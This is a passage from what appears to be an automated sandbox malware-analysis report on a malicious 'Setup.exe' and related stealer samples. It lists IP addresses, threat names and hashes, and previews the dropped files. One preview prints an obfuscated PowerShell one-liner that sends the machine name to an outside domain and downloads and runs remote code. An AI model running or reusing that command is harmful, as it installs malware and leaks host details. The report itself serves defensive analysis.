                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                                                  • 172.67.162.65
                                                                                                                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousCredentialStealerBrowse
                                                                                                                  • 162.247.243.29
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.81.153
                                                                                                                  https://arkansasbaptist.info/o360/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.21.71.217
                                                                                                                  http://csssssswdsaawsssdwqeqw.1008611.cfd:8443/matchGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.38.249
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  https://simplebooklet.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 104.27.44.61
                                                                                                                  CLOUDFLARENETUS!SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.187.171
                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                                                  • 172.67.162.65
                                                                                                                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousCredentialStealerBrowse
                                                                                                                  • 162.247.243.29
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.81.153
                                                                                                                  https://arkansasbaptist.info/o360/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.21.71.217
                                                                                                                  http://csssssswdsaawsssdwqeqw.1008611.cfd:8443/matchGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.38.249
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  https://simplebooklet.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 104.27.44.61
                                                                                                                  CLOUDFLARENETUS!SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.187.171
                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                                                  • 172.67.162.65
                                                                                                                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousCredentialStealerBrowse
                                                                                                                  • 162.247.243.29
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.81.153
                                                                                                                  https://arkansasbaptist.info/o360/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.21.71.217
                                                                                                                  http://csssssswdsaawsssdwqeqw.1008611.cfd:8443/matchGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.38.249
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  https://simplebooklet.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 104.27.44.61
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1!SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  qAyJeM1rqk.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.58.9
                                                                                                                  • 104.20.4.235
                                                                                                                  • 104.21.63.229
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  C:\Users\user\AppData\Local\Temp\108941\Contrast.com!SET__UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                          receipt-016.vbsGet hashmaliciousRemcos, AsyncRAT, XWormBrowse
                                                                                                                            Lw5RC3lKVg.exeGet hashmaliciousStealcBrowse
                                                                                                                              file.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                8Y78ZNdmmQ.exeGet hashmaliciousAmadey, LockBit ransomware, PureLog Stealer, zgRATBrowse
                                                                                                                                  AacAmbientLighting.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    AacAmbientLighting.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Nlllulk:NllU
                                                                                                                                      MD5:E3761B426AE48FB1A0DC4185939CE050
                                                                                                                                      SHA1:68FE06F45EF35CA47E1DB124FEE98132D9BB5F7C
                                                                                                                                      SHA-256:0E97F83FAA0ED9C80EAEA1630FABAE55C3D86E1F9E506BA128080F8A22DBFD89
                                                                                                                                      SHA-512:061A4939A10722B1F92A1A7787D41834509B683813889E93BF9E38C4034FFE2B26FA4E562B69FE6A8F4C75C49C9B45AEF620B05C409B8D1D8A729962D55E5656
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:@...e.................................:..............@..........
                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):483809
                                                                                                                                      Entropy (8bit):7.9996561028805235
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:12288:Sv82akbFzP+MRk1WqT4IbQ8a8ute2dRt9xDC6tqtt1sK8UPR:j2lVPF04iQ7trdtzsl8UPR
                                                                                                                                      MD5:806B6DD473DCACBF71A3FDE7FC46BA75
                                                                                                                                      SHA1:5D4852EF29C3D05A0637D42E244A2DB17753866A
                                                                                                                                      SHA-256:08219B5AC5051356D52AAC4C9D5C72152C74F96B2F4FECEE3F3773ECBF1B5927
                                                                                                                                      SHA-512:2A9387DC43CA050C6D28FAEC4632EBBF898F1E8530F7099A8D59A28FB9E8FE7CD05E1C811D43AAEED92A2AA8E09001BB0724B758A44119E0E1B3EA03A09FD38D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..j..N....o.@..z.>/.P9N.".........T..1.....D.$....ZF.rb........Q..7.......Je....p.=fb....q......~.....L.1..F........co.|1|.r.$.].8...a..u.ub_...8....iJUs.#....c...B.y.......n"..KKq..V.>>.h...Q~kcF..oo.N..zl. .o...~.;...K.CV.....`A5.O..*H.K..c...[2....P$|..4....}..Tw..I...}.0...XR]..2...U*..S..A#.N.r......0K...b@...W.U.kv..n......t.Z./.+n.5../...T........P..[.hX._Y.9'.)iaA.S?..U..[.h.....!].%TXA.....=..L..T.A........*`.H........!..u...2..QF...0G.-.......1..V. .?...S.W.Fm(k..?-B..'.])5.?O:......X?...*...*-FX].[..x#.X....HV.i..:..F...........h...4...j.T.az.5L..qo.".\."...:.{..<.S.......a...p.....q$.....q.2^.f......w`.....l.?......@..9....R..`..6n.........2.(.<..N}.hu.q-;.xTM.;..J. .....~.."....-.....BR..EF...T\Tb..h........bD.....P....?.Z8..pM...3F........-.&]B.N.....)Gn...M....f...N"0L..XZ........U|...C..5.3.h9...L..c......Ei.M.}..=l.r..}U..........U..iFZMA....v...y4J##....... Ko.u.9.0...5...#l.K...].....".#.....;....6U..%.9......@.
                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):893608
                                                                                                                                      Entropy (8bit):6.620254876639106
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                      MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                      SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                                                                      SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                                                                      SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: !SET__UP.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: receipt-016.vbs, Detection: malicious, Browse
                                                                                                                                      • Filename: Lw5RC3lKVg.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 8Y78ZNdmmQ.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: AacAmbientLighting.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: AacAmbientLighting.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      File Type:ASCII text, with very long lines (331), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):331
                                                                                                                                      Entropy (8bit):5.594951804280232
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:4wXsAEhF9wAJ7f50CvaV/gGkyIAvP4XrD57QjjLOLRB2DOexWb2R/JFtXXxNqCeS:4blFZfd4DkyIgPmQj6RB2DOexWb2R/JL
                                                                                                                                      MD5:EB8A82CF3676AEB10AF460E8A5049BE5
                                                                                                                                      SHA1:688C6C53179BB82D570FBED512DC417F81B2C541
                                                                                                                                      SHA-256:B7E1DD2A46E27759D538B5A7C76BE23A8010FA5322E093259FA6100B10CF7D14
                                                                                                                                      SHA-512:B61A14CB7D0005FB24FB1EC29231200AF1C5BF60E8B023EA717D30A81D7B801240B1911E42BCE14F3AF745F87516BFF12D1B06304313281FD3D11089145863CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://snowqueen.site/calling.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/538.1 (KHTML, like Gecko) Chrome/112.8.3.0 Safari/538.1'; IEx $Ptsr.Content;
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76800
                                                                                                                                      Entropy (8bit):7.997459006149351
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:0Wecu38LBUkWuKM0HNrtt5SdASeWntx74bQQQarnSxTeJmSy:TecTpWuuH1tqtx74bQWrcT1L
                                                                                                                                      MD5:DAF5DB58D0EB40ECB2601583B2661132
                                                                                                                                      SHA1:9EB1AFA55FC9AE390960E70B5810B71CC55DB60E
                                                                                                                                      SHA-256:9FB51AE7F6879DB47292B3B4C224D8252674CD4CF5352C82B656D9B2E2A3CC1B
                                                                                                                                      SHA-512:39C4727C7503561539AF133D5562C05FAE884398A511E824374B296744F3D2B366760776B891F36658FDD7C13E23C5FCCB0B672607845F4CC29B17A8D79FB428
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.x.1.R......'C.M.C.Fca......@/.._.....q&....nQ..o.nwc..e.D'E..#=W...]/..5M..J...c.m^x...S?...I.A.T....l...A.2....)..........a..[.....fU....M.$..............#bQ56U(BN...{K,.x;n..'Xv....#.......R@..R....Vl..M$...V)s.... .q.z.......;D.2........%z.1D.....\..........J.K...vz").%.B@.....[@..e.w...G..g.3..i...D.N.L..P..:..I.d.... s{V/.......@....G..W.KM.a..@\=c.c.7.m.w.i..ZR.p..$..gQ.... ...v#.9a.F.s..I.Vv. ..3..r...E.rJO...../.qa-y8.*.u............b....K. .P.4..I[+.R.........n7`.uW..C.T......%..M.....Hc.+oj.l0...l.u.a.=...G.M.x..4"._.pc.>.[&..[..........nABUz+.q..:K..I..6...p{9.(....%,.....l).....j'|n(...)...1..Ha{GO..!.;..KP=.U.w.....*...t.,:..5r.w}...58!..U?..{...L..FBp.J....z..F.6x..n.z.5.(.\`..0.........&2....(.3...L..=.X...r..".uPm%.!.\R5....?)..RR...=~&4...g..S..p.[..#.6._..Q.|......k..1..'..s..(G....,.H..n..@..^M.Sl_@...t.~.....Rr. `..0..K.3>...Q.6..`.Z.FQ.a..lF@.K..~{R..bf.&(.B..("7bK.g....e8..v..1......E+..]t.B.I....!!.}b.. sg.
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):54272
                                                                                                                                      Entropy (8bit):7.996986188065043
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:WLRw9YuDgWey7OG2SDGmcJEkm/8oBZhC7K7X+V:goTeJaGm4Ekm/8oBsIXs
                                                                                                                                      MD5:C914C95ED118A429085AAE251C8AD6E5
                                                                                                                                      SHA1:5D62F4B499BC5B1C222B7EF81CD885110ABCEE77
                                                                                                                                      SHA-256:97FB745E2A922C810F975985933149C086D808D86AAE6EA3C2AAAED1575EC766
                                                                                                                                      SHA-512:CA6870E4D4DF1AFBE281ACBD485051DBEAF9DC652152DF6A500BB93C8130C3471A2552107270E63E41AA2BE29C3CC9365C76343B931EC5D5A1E4781299749F9C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:\.......u.$q...i..}.YpM.9.-HuS.....G../..O\..d..)!p..!.t?....K..;...=.I...l8i Xd..?.-p2.A..l.<..J..}...G.....G..#..1CY.....)..Y..,.m...<...S....xUu...._....=e.=<.3y+..la...WOuY.F4V{...>...8......U...w...6.........$=.$::..(.o3%.?.Gt.M^..VE.\.a.LzC..5a(*.G6..nKa..ar=V.c5aQx..5<.G...T..]...Wt%..h"M:...>....1...z_.n5a}=.*B..W.2JKh.#Y.q...k7........X..B....=.K.o.Nm.p... ......... 3..k...B+......t..Hv...w..g...G..0.............~<1....J..0&D..{..x...A..Kf...{...........lz.H......'C..<.|.f7..d........T.~.L.K...+..T......&.y.N...#z.dMU..z.}.{..q.......<.CsK...n.....U..... ..Pw.4.w<..r...f...}9.;\...._....<.j.#...O..1..@....j...$...M;...&...f......q.Ve.;......2*[....c.uH..e.....j.`".].x...G...9.U..J...{...'..z...8....`!.........Q.@...xK..+.....3.sY....\[\n.>f....].).?.i.....H.....m...sq.,.....fr.].....I...Q..E..,;p.2....X{H.h@...z....{ .UAW:.7.Mo6..}.......yW.........a.0}....R...b.qe.*.....8|.w...j.V.:p.w..K..w..K\e-@K..."] ;V|.Q...1j};..
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):63488
                                                                                                                                      Entropy (8bit):7.99720420005683
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:damaUYyw7Pd3NjW1Nk+lAZbgf5xpPAf94a7z:damatpr+lACf5xpK94av
                                                                                                                                      MD5:8DAFAA28609F75561A7911E86100BF81
                                                                                                                                      SHA1:AFEAA7BF40C0D21848642ADFD81BB98CA691D888
                                                                                                                                      SHA-256:C68981B3F765CFD8293FA033B5A0E5D15E864EC0DBDB9DD28B99733CDC62577A
                                                                                                                                      SHA-512:932FD3D1F7BA6E26BA894233FD5CD4555A94D0BA936CB66F75DAC7EBC9AEAEE9753CA2A917226BEDC3D870720D79289E4E8583B43E5F422D451D2FCD11312902
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.e...Wg)...=~.....d....j.X......~i....W{.......\..c+.A..:d.a\Gm.|.c2V....0g}......}J...m....Y.c..6...r~...q.2=y.K..8..Csa@.T.........MD\...........53|....sWM......&.\#dD.4Y.Oj(O...!..P....rs........ .Ue.n....1......f...&......"..:..>..h.m/.*.J{Y..6m....a.....a....Q..W.4...%iv%.3..9..POp.v.N.8....(....:G..bm0...If..[.g.............*>..q......g.U......(..N:..0..............\...yE..R..s......v^...]..n.D..O...-.C.s..Y..)....u.......d...)....MY.j7Cb....-..L.....#.bs./..&......P.R.U....+g...`.^:...8.`..k.....+.....>2.....H~3P.[..V..l....\..:f.L...za....Jx..^..+......,...40..M.|....7.o..c....."...'.......I..;X.F.=.T...xb.1...S...n.v]LCP......\7....*.*s0Z..!#....ZP.<.)b.....p.8.|:.h.<f.a..!..].....I.\....O..`......nt......{+...^.46..=.)-.RL..J..(....h.....w&u(LE.p......B.-nd.!.~.2.d.j.%C....U.m..0....6.g..]~.1.|..V.*=qE..A.\F.....P.)..0..\...............u.._..v...:F_~,.~#..h.......k.H2.s..l.I.c......x<.r*e..\.iO.[@a..3.=V.?&..........h.5
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):79872
                                                                                                                                      Entropy (8bit):7.9978910462934945
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:kPCKSem3nURXYvpfK3FWvSR3Uw22azqhbULPZ9C1z+IWY2lrK0cK57c:iCowpyD3UoazaILB9CcIWxr/cZ
                                                                                                                                      MD5:1A816E528E275788A97DFF666073F95E
                                                                                                                                      SHA1:25FE8B783EEF44E61E04FA5A1B8BB746E4E6A409
                                                                                                                                      SHA-256:633A5BCABB1B800E6643521E7771F9FCB5DA6DFF3934AE62D19BA00D7C905FCE
                                                                                                                                      SHA-512:1E2EA0B524ABBD3851BCBFB5F5405127050035D0E5A4014DBF8AA138191175B9F8E08AA34E0772604A8A875A45EA1084DD78EAB81054A957DDEA861E2B686A1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...G....N...>~.|.yb..^}.....a..T3d...SjrX..$R]..i.FXy.u..\.X...5_.&v..ck6.jD..4.D...IF.h...<Ig.5._...(...BO./4......|>o._..$L76.'........n...M..A.0...I-.y&.O..>...b.......g...L.j...)..[}Z.]..Y.B.O5(.3|d.Z......?m-?&.ms.'..w.,..og...._..M.^.3b..;....5d.....[.IE..P.K.Q.C...v..F..mt._.Z<.B..}`..<.H? N.g{...-...X..p..y.7.B.a..~..B.,..V.*%]....C.......u.....u......|V6.h]Z.....IIm..fa..._.....c...E-......._...Z5.h.s..$Y.".........@..../..._.UF-C...W "..Qk.....Pp.>....k...\N/!...Q.$.+.......e....1h.....e6..7a.3.u}"saV.|..E..px..........#.....I...u..h.a...Y3.^..0..qSM...%....O$......Sl.dJ:...v...<.6...y.[..@..:.V.I...+....oI.O$D.z*.:fI.......'.F......y,......e.+?E.!..[....^..hn.gC.,.V..8...6.Ky6c...d...&*.8....T......N..XPA.J...&...g].u..._xg....J.S.l.I..70^..N!5.W...%....b.i.~O..D.A[n.M.!....]..>.."a....F%.M.."...|...'.<.{KO...J.\_.....A6.F.uZ.M4_......P.o8!$.7../..k..U.X>..O........^..x..M.........;,+Q....H+s('y.m....d3x7~.;....zh.W....
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20961
                                                                                                                                      Entropy (8bit):7.991812241746528
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:1hC3fnT8HXNrQS1Aw2EJ5Tg2n4kZEwgdaqbmessg3IF4MZYF3v8yIk35Rtc:C3bmkSSw2+62nNZETUQmesfIFAky1vC
                                                                                                                                      MD5:C5C0D5F08D770F056C0FC652D526B07A
                                                                                                                                      SHA1:3062A4B0DAB2A0C0FADB36503F58963F17B7DB3F
                                                                                                                                      SHA-256:5ABFD3AED85AA0AD6A4E8087919A5131F78FD1A7E6714EBF66089D9CD64DAB21
                                                                                                                                      SHA-512:3F82C060872B6CF3033AFAEEE6B6EE076F1784D349F46EF3EEE7287BDF86A17D36D6BC29EC2B68A02C5A43F87EB48A38D2CAAB5A5F8EDA223F7D407282103945
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....w..jB.X.-..OH."1..r".:...#m.`....:!.(..H7.t.}\.7...49...>Z....Df..8\.G.,..X...)..41..X..E.q..-.1.1-......c..b5...[b..BlS#S....L.....^.t53.:.tGB.o8z.hKJ..>.).BrV.W*...H..H;...d..\..../.6.A<.dR..[..:x....W.."M.....\_w.F.H1UY.....yV.O$....&.8A(....n..b=.6.)..kP...d..W..V7..].....bXE.a..I$.....7.c/.=w2.#.?.(.b.q..|...".a.G.t7...{L$g.%.......`H..Wf...'..K...._..$+z...v.!...p'.q..4....l`Rf..e.a..o{?.8.......u.5]..FV..R.v.-z_m....^.!.).....c.jdGzrMi^.N^."..ZfxP.S.....X....X..M...r:..3.v.<.BI.4.pNwu....M..<M.2v].[S.6...6.BQN..K..{E.....H.......1Z.>..IV..u.H4.....h...W...D....ju.T.&..B.D{..f....ty;x...Iy.8-.`y.......=g.Wu.?.7n. Bef1N5....0[[Wq!R..)6......#.q..+9.O.U..a......;Z.R..].N.}.vs6i..b.Q.. .V...L)..:*...P 8X.A/o..,.Z.*b.....W...@........,.E....a..B.....P..%..}.t...ME...}."...*.Z..?pO.C......7.=~O..Sm~.y.....J.M"*..=n....$.....GQX{......?1x..F.2JG...7?..:...\...O...5....w..I..1....vbNZJ..O7J.?..^....%.\..+........ZQ...3.$Ln....=M.E.
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:ASCII text, with very long lines (780), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):19591
                                                                                                                                      Entropy (8bit):5.117107578871211
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uQfo2dAnKPy6b9Iddv+ll4dN4syMUWX4rrozc3YIwnCWSC83uIIMiXRETIYo/Hgs:uQfvdEyIQU4LMvIr6c3qKp3uIbSREqP
                                                                                                                                      MD5:4BAF849B6D7587BBEE16BC5A96022D1F
                                                                                                                                      SHA1:FAC2CB0CB4AB2E15821BCB0EC8044AB81964107F
                                                                                                                                      SHA-256:50A7D9FE6D2FFEFEF512A90455440CBCA438C4A255995C24023656410536BDF5
                                                                                                                                      SHA-512:4406A9175E676107E9006213D2240DA58161C60BE8372081077B710A829CAF0BFCE8EF9374E420EEEA894326F8812A5E0ECEBD35F0911DE1C16371B6C5AAD77C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Set Estate=L..tVAXHarder-Ignored-Uruguay-Invest-Nu-Consciousness-..oVIMadagascar-Puppy-Beginning-..InJeff-Patterns-Bernard-Logging-Sad-Overnight-Conditioning-..KhkmDescribe-Manitoba-Exclusion-Island-Inclusion-..MfvbBeat-Butterfly-Gear-Possibilities-America-..FyFoEpisodes-..TIdOrg-Killing-Bizarre-..vpwZOctober-Qt-Tablets-Recommended-..elEPensions-Did-Lender-Vary-..Set Supporting=8..RAMonkey-Configuration-..VWIUVerify-Olympic-Prices-F-David-Followed-Kruger-Singapore-..goCVBeginning-Rf-Males-Olive-Accidents-Graduation-..mgHdUtils-Dpi-Biblical-Benjamin-Cnn-..GkBox-..eAuKPenny-Sound-..XfYBelle-..dIAIp-..Set Kept=F..ZMTruth-Verzeichnis-Par-Evaluate-Chicken-..UcMRugby-On-Threesome-..xeRemedy-Floors-English-..VrBProceed-Whom-Verde-Poet-..NiGRod-Toshiba-Previous-Twin-Ballot-..jtEmergency-Tp-Safely-Cvs-Legacy-Authentic-..xnHousing-Casa-Affects-Taiwan-Borders-Warren-..EWMMailing-Overseas-Wound-Hb-..maaAllan-Atomic-Elements-Energy-Saint-Omissions-Mint-..Set Situations=A..ZDYVPasswords-Carriers-Fra
                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      File Type:ASCII text, with very long lines (780), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):19591
                                                                                                                                      Entropy (8bit):5.117107578871211
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uQfo2dAnKPy6b9Iddv+ll4dN4syMUWX4rrozc3YIwnCWSC83uIIMiXRETIYo/Hgs:uQfvdEyIQU4LMvIr6c3qKp3uIbSREqP
                                                                                                                                      MD5:4BAF849B6D7587BBEE16BC5A96022D1F
                                                                                                                                      SHA1:FAC2CB0CB4AB2E15821BCB0EC8044AB81964107F
                                                                                                                                      SHA-256:50A7D9FE6D2FFEFEF512A90455440CBCA438C4A255995C24023656410536BDF5
                                                                                                                                      SHA-512:4406A9175E676107E9006213D2240DA58161C60BE8372081077B710A829CAF0BFCE8EF9374E420EEEA894326F8812A5E0ECEBD35F0911DE1C16371B6C5AAD77C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Set Estate=L..tVAXHarder-Ignored-Uruguay-Invest-Nu-Consciousness-..oVIMadagascar-Puppy-Beginning-..InJeff-Patterns-Bernard-Logging-Sad-Overnight-Conditioning-..KhkmDescribe-Manitoba-Exclusion-Island-Inclusion-..MfvbBeat-Butterfly-Gear-Possibilities-America-..FyFoEpisodes-..TIdOrg-Killing-Bizarre-..vpwZOctober-Qt-Tablets-Recommended-..elEPensions-Did-Lender-Vary-..Set Supporting=8..RAMonkey-Configuration-..VWIUVerify-Olympic-Prices-F-David-Followed-Kruger-Singapore-..goCVBeginning-Rf-Males-Olive-Accidents-Graduation-..mgHdUtils-Dpi-Biblical-Benjamin-Cnn-..GkBox-..eAuKPenny-Sound-..XfYBelle-..dIAIp-..Set Kept=F..ZMTruth-Verzeichnis-Par-Evaluate-Chicken-..UcMRugby-On-Threesome-..xeRemedy-Floors-English-..VrBProceed-Whom-Verde-Poet-..NiGRod-Toshiba-Previous-Twin-Ballot-..jtEmergency-Tp-Safely-Cvs-Legacy-Authentic-..xnHousing-Casa-Affects-Taiwan-Borders-Warren-..EWMMailing-Overseas-Wound-Hb-..maaAllan-Atomic-Elements-Energy-Saint-Omissions-Mint-..Set Situations=A..ZDYVPasswords-Carriers-Fra
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):53248
                                                                                                                                      Entropy (8bit):7.996132095968121
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:SeGlZUBS06fkwxMxA0d4u2h6QB56Vizdsypnfc/:SeG506fXxf0n2h0Kdbfc/
                                                                                                                                      MD5:A543999CAB76EE90AFBEC46D01CDE9F7
                                                                                                                                      SHA1:D309A389FABDAF03740DF7231D1333CBA035C5A9
                                                                                                                                      SHA-256:962E7A142ED61D5A0D0F4EF4C560F9734C213D5201DFDC286646903F291FC92A
